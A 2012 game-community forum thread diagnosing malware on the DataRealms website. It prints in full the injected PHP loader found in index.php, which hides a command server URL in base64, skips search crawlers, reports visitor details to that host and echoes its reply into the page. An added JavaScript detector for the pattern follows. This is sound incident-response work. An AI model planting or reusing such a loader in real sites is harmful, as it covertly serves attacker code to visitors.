


Reply to topic  [ 37 posts ]  Go to page Previous  1, 2, 3  Next
 DataRealms Website Malware Warning 
A HUMAN BRAIN, SAFELY INSULATED FROM THE TERRORS OF HYPERSPACE

Joined: Sun Jan 28, 2007 8:54 pm
Posts: 1070
Location: Somewhere beyond the endless sea of hyperspace, fighting for your right to call a planet home.
Post Re: DataRealms Website Malware Warning
Well, this isn't any good, is it.


Mon Jun 11, 2012 4:01 pm
DRL Developer

Joined: Wed Dec 13, 2006 5:27 am
Posts: 3138
Location: A little south and a lot west of Moscow
Post Re: DataRealms Website Malware Warning
As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM.


Wed Jun 13, 2012 2:28 am

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Post Re: DataRealms Website Malware Warning
Wish I could help; all I can do is point out problems, though.

The warning is gone right now, that said.


Wed Jun 13, 2012 2:48 am

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Post Re: DataRealms Website Malware Warning
Uh oh. The warning is back again.


Thu Jun 21, 2012 10:37 am

Joined: Tue Dec 12, 2006 3:10 pm
Posts: 495
Location: Uncertain quantum state
Post Re: DataRealms Website Malware Warning
http://pastebin.com/Y9rTWnzJ

Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch.
It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111",
the script src being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO".

Funny obfuscation.
It creates the strings "eval", "substring", "fromCharCode", "indexOf" and "charAt" from the variables, and calls them as functions.

I think the starting ifs break the script after it executes, removing it.

http://pastebin.com/QuWRS4Hd Here's my best-guess unobfuscation and cleanup.

The script then takes a substring and evals the decrypted code. http://pastebin.com/MLY8i1kG
I.e. exactly what Daman said.


Sun Jun 24, 2012 1:21 pm

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Post Re: DataRealms Website Malware Warning
Once again, the warning is gone, for now. Hopefully, for good.


Sun Jun 24, 2012 6:01 pm
The Licensing Guy

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Post Re: DataRealms Website Malware Warning
If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code.

Site seems clean now.


Sun Jun 24, 2012 8:38 pm

Joined: Tue Dec 12, 2006 3:10 pm
Posts: 495
Location: Uncertain quantum state
Post Re: DataRealms Website Malware Warning
As already said, it seems to be happening once per IP or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes.
Or maybe it uses cookies.
I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides.

Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh.


Sun Jun 24, 2012 8:45 pm
The Licensing Guy

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Post Re: DataRealms Website Malware Warning
Thanks for the info, findude.
Seems we had this stuck in index.php

Code:
<?php
// [note] Injected snippet as found in index.php. The "statistic" comments are
// the attacker's own and are misleading; lines marked [note] were added here.
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // [note] Despite the comment, this skips search-engine crawlers AND Opera,
    // Chrome and Safari, so the payload is served mainly to Firefox and
    // Internet Explorer visitors, and never to anything that might index it.
    if ((strstr($sUserAgent, 'google') == false)
        && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false)
        && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false)
        && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false)
        && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
            // [note] The base64 literal decodes to http://botupdatestatistic.com/stat/stat.php;
            // the visitor's IP, user agent, host and requested path are sent to it.
            $stCurlLink = base64_decode('aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==')
                . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        // [note] If the remote reply starts with "O", the rest of it is echoed
        // straight into the page: that is where the hidden iframe came from.
        // The remote end decides per request, which fits the once-per-IP
        // behaviour reported above.
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

So it was getting the evil code from an external site. Time to audit security it seems!


Sun Jun 24, 2012 10:11 pm
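A detector for the injection pattern in the snippet above, as an added example written for this page rather than the site's own tooling. Both PHP inputs are constructed for the example: INFECTED keeps the shape of the posted snippet, including its base64 literal, so the address it decodes is the one index.php was actually contacting; CLEAN is a harmless use of the same functions, to show the decoder does not fire on base64 and curl alone. assessPhp reports the indicators a cleanup would want to check across a web root: a URL hidden in a base64 literal, a user-agent gate, visitor details in the query string, and the fetched response echoed into the page.

```javascript
// Added example (not the site's code): flag PHP sources carrying the
// "fetch hidden URL, gate on user agent, echo the reply" injection.

// Constructed sample: same shape as the snippet posted above, including
// its base64 literal, trimmed to the essentials.
const INFECTED = `<?php
if (!isset($sRetry)) {
  $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
  if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==')
      . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    @$stCurlHandle = curl_init($stCurlLink);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0] == "O") { $sResult[0] = " "; echo $sResult; }
  }
}
?>`;

// Constructed sample: legitimate base64 and curl use, nothing echoed.
const CLEAN = `<?php
$token = base64_decode($_ENV['API_TOKEN_B64']);
$ch = curl_init('https://api.example.com/v1/ping');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Authorization: Bearer ' . $token]);
$status = curl_exec($ch) !== false ? 'up' : 'down';
error_log('upstream ' . $status);
?>`;

// Decode every base64 string literal passed to base64_decode and keep
// the ones that turn out to be URLs: attackers hide the C2 address this way.
function hiddenUrls(src) {
  const re = /base64_decode\(\s*['"]([A-Za-z0-9+\/]+={0,2})['"]\s*\)/g;
  const urls = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    if (/^https?:\/\/\S+$/i.test(decoded)) urls.push(decoded);
  }
  return urls;
}

// Score a file on the indicators that, together, mark this injection.
// Any one of them has benign uses; three or more in one file do not.
function assessPhp(src) {
  const urls = hiddenUrls(src);
  const signals = {
    hiddenUrl: urls.length > 0,
    // The variable holding curl_exec's result is later echoed.
    echoesFetched: /\$(\w+)\s*=\s*@?curl_exec\([^)]*\)[\s\S]*?\becho\s+\$\1\b/.test(src),
    // Branches on the visitor's user agent before fetching.
    uaGating: /HTTP_USER_AGENT[\s\S]*?strstr\(/.test(src),
    // Sends the visitor's address to the remote end.
    leaksVisitor: /urlencode\(\$_SERVER\['REMOTE_ADDR'\]\)/.test(src),
  };
  const score = Object.values(signals).filter(Boolean).length;
  return { urls, signals, score, suspicious: score >= 3 };
}

console.log("infected:", assessPhp(INFECTED));
console.log("clean:", assessPhp(CLEAN));
```

Run it over every .php file under the web root (the injection sat in index.php, but the same loader is typically dropped into several entry points) and treat any decoded URL as an indicator to block at the host's egress, since the server, not the browser, is what fetches it.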

Joined: Sat Jul 10, 2010 5:19 pm
Posts: 543
Post Re: DataRealms Website Malware Warning
So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly?


Sun Jun 24, 2012 11:58 pm
DRL Developer

Joined: Wed Dec 13, 2006 5:27 am
Posts: 3138
Location: A little south and a lot west of Moscow
Post Re: DataRealms Website Malware Warning
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.


Mon Jun 25, 2012 5:17 am

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Post Re: DataRealms Website Malware Warning
I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that.

But I'll send the PM if it happens again.


Mon Jun 25, 2012 6:15 pm
The Licensing Guy

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Post Re: DataRealms Website Malware Warning
TheLastBanana wrote:
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.


The last little while being from May 20 onwards.


Tue Jun 26, 2012 7:07 pm

Joined: Fri Aug 26, 2011 3:06 am
Posts: 42
Post Re: DataRealms Website Malware Warning
I ran an Avast scan on June 10 and an MWB scan on June 25. The former resulted in a supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.


Tue Jun 26, 2012 8:17 pm
The Licensing Guy

Joined: Sun Aug 24, 2008 2:00 am
Posts: 64
Location: Buenos Aires, Argentina.
Post Re: DataRealms Website Malware Warning
NikolaiLev wrote:
I ran an Avast scan on June 10 and an MWB scan on June 25. The former resulted in a supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.

I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.


PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff.


Tue Jun 26, 2012 10:35 pm